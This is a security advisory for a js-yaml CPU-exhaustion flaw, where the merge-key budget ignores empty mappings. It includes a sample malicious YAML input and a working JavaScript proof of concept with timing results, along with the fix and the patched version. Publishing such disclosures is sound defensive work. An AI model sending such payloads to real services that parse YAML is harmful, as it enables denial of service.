---
id: GHSA-r3ph-w7gj-g6xm
title: 'js-yaml: maxTotalMergeKeys does not limit CPU use for empty merge sources'
summary: 'js-yaml: maxTotalMergeKeys does not limit CPU use for empty merge sources'
severity: medium
cvss: 5.3
cwe:
  - CWE-400
  - CWE-407
vendor: js-yaml
product: js-yaml
ecosystem: npm
affected:
  - 'js-yaml >= 5.0.0, <= 5.4.0'
patched:
  - js-yaml 5.4.1
published: '2026-09-29'
updated: '2026-09-29'
sourceUpdated: '2026-09-29T17:57:40Z'
source: GHSA
sourceUrl: 'https://github.com/advisories/GHSA-r3ph-w7gj-g6xm'
references:
  - url: 'https://github.com/nodeca/js-yaml/security/advisories/GHSA-r3ph-w7gj-g6xm'
  - url: >-
      https://github.com/nodeca/js-yaml/commit/6a8e05f9a485188ed730ac81e81ae221352ef480
  - url: 'https://github.com/nodeca/js-yaml/releases/tag/5.4.1'
  - url: 'https://github.com/advisories/GHSA-r3ph-w7gj-g6xm'
tags:
  - ghsa
  - npm
ingestedAt: '2026-09-29T18:42:35.833Z'
---

## Overview

## Summary

`maxTotalMergeKeys` does not count empty mappings. An attacker can repeatedly merge a large sequence of them and consume significant CPU without reaching the configured limit.

## Example

```yaml
arr: &arr [{}, {}, {}, ...] # N empty mappings
targets:
  - <<: *arr                # repeated K times
```

For every target, the loader iterates all `N` elements of `arr`. This results in `O(N * K)` work while `totalMergeKeys` remains unchanged.

## PoC

```js
import { performance } from 'node:perf_hooks'
import { load, YAML11_SCHEMA } from 'js-yaml'

const n = 20000

const src =
  'arr: &arr [' + '{},'.repeat(n).slice(0, -1) + ']\n' +
  'targets:\n' +
  '  - <<: *arr\n'.repeat(n)

const started = performance.now()

load(src, { schema: YAML11_SCHEMA })

console.log(`${(performance.now() - started).toFixed(1)} ms`)
```

Observed results:

| N | YAML size | Time |
|---:|---:|---:|
| 800 | ~13 KB | ~20 ms |
| 3200 | ~50 KB | ~180 ms |
| 20000 | ~500 KB | ~13 s |

## Impact

When merge keys are enabled, an attacker can submit a relatively small YAML document that causes prolonged CPU consumption despite the default `maxTotalMergeKeys` limit.

## Fix

Count every merge source mapping as one budget unit in addition to counting its keys.

## Affected packages

- `js-yaml >= 5.0.0, <= 5.4.0`

## Remediation

Upgrade to a patched release:

- `js-yaml 5.4.1`
